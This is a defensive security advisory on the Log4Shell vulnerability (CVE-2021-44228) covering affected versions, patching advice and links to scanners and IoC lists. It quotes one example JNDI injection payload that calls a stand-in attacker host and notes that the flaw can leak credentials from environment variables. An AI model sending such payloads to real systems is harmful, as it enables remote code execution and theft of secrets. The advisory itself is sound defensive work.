Summary

In the wake of the Log4Shell vulnerability - CVE-2021-44228, our support partner JISC have been monitoring network connectivity and looking for proactive ways to prevent exploitation.  

It is imperative to take into consideration the entire infrastructure when responding to this vulnerability, as a substantial number of applications use Log4J for logging.   

This vulnerability is being actively exploited and JISC are continuing to look for threat actors who may attempt to utilise this to their advantage. Once threat actors have been positively identified and depending on the IoC, blocks will be implemented on the Janet network and the Janet Network Resolver Service (JNRS) where possible. 

Key Considerations:

• A substantial number of applications use Log4j for logging, attackers simply need to log a string to attempt the exploit. E.g. ${jndi:ldap://evil.xa/x}  
• The exploit can also be used to read server environment variables. If Git credentials or AWS keys are set, they can be stolen without needing full Remote Code Execution (RCE) access.  

Vulnerable versions :

• log4j between 2.0 and 2.14.1 are affected.  

Recommendation(s):  

• Patch to the latest version of log4j 2 (log4j 2 2.15.0) 
• Contact any 3rd party software vendors you use to query whether they may be vulnerable to log4j. 
• There are several open-source products available which can aid with scanning for vulnerable systems:
  • NMAP: https://github.com/Diverto/nse-log4shell
  • OWASP: https://github.com/OWASP/Nettacker

References:

• https://logging.apache.org/log4j/2.x/security.html
• https://research.nccgroup.com/2021/12/12/log4shell-reconnaissance-and-post-exploitation-network-detection/
• https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
• https://github.com/curated-intel/Log4Shell-IOCs

Questions:

If you have any questions or concerns about this advisory, please contact us via our support desk – support@empsn.org.uk